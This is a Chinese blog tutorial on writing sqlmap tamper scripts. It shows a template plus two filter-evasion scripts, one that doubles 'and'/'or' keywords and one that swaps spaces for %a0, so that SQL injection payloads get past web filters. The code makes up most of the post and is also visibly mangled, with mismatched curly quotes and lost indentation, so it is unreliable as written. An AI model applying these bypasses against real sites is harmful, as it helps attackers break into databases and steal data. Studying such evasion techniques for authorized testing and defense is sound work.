Tamper-CSDN博客

本文链接：https://blog.csdn.net/weixin_52717285/article/details/137881770

标准模板

#!/usr/bin/env python
“”"
Copyright © 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file ‘LICENSE’ for copying permission
“”"

导入SQLMap中lib\core\enums中的PRIORITY优先级函数

from lib.core.enums import PRIORITY

定义脚本优先级

priority = PRIORITY.LOW# 对当前脚本的介绍,可以为空
def dependencies():
pass
“”"
对传进来的payload进行修改并返回
函数有两个参数。主要更改的是payload参数,kwargs参数用得不多。在官方提供的Tamper脚本中
只被使用了两次,两次都只是更改了http-header
“”"
def tamper(payload, **kwargs):
# 增加相关的payload处理,再将payload返回
# 必须返回最后的payload
return payload

第一个双写绕过脚本double-and-or.py

#!/usr/bin/env python

-- coding:UTF-8 --

“”"
Copyright © 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file ‘LICENSE’ for copying permission
“”"

导入正则模块,用于字符的替换

import re

sqlmap中lib\core\enums中的PRIORITY优先级函数

from lib.core.enums import PRIORITY

定义脚本优先级

priority = PRIORITY.NORMAL

脚本描述函数

def dependencies():
pass
def tamper(payload, **kwargs):
# 将payload进行转存
retVal = payload
if payload:
# 使用re.sub函数不区分大小写地替换and和or
# 将and和or替换为anandd和oorr
retVal = re.sub(r"(?i)(or)“, r"oorr”, retVal)
retVal = re.sub(r"(?i)(and)“, r"anandd”, retVal)
# 把最后修改好的payload返回
return retVal

第二个空格替换脚本space2A0.py

#!/usr/bin/env python

-- coding:UTF-8 --

“”"
Copyright © 2006-2020 sqlmap developers (http://sqlmap.org/)
See the file ‘LICENSE’ for copying permission
“”"
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
priority = PRIORITY.LOW
def dependencies():
pass
def tamper(payload, **kwargs):
retVal = payload
if payload:
retVal = “”
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
# 把原先的+改为%a0即可
retVal += “%a0”
continue
elif payload[i] == ‘’':
quote = not quote
elif payload[i] == ‘"’:
doublequote = not doublequote
elif payload[i] == " " and not doublequote and not quote:
# 把原先的+改为%a0即可
retVal += “%a0”
continue
retVal += payload[i]
return retVal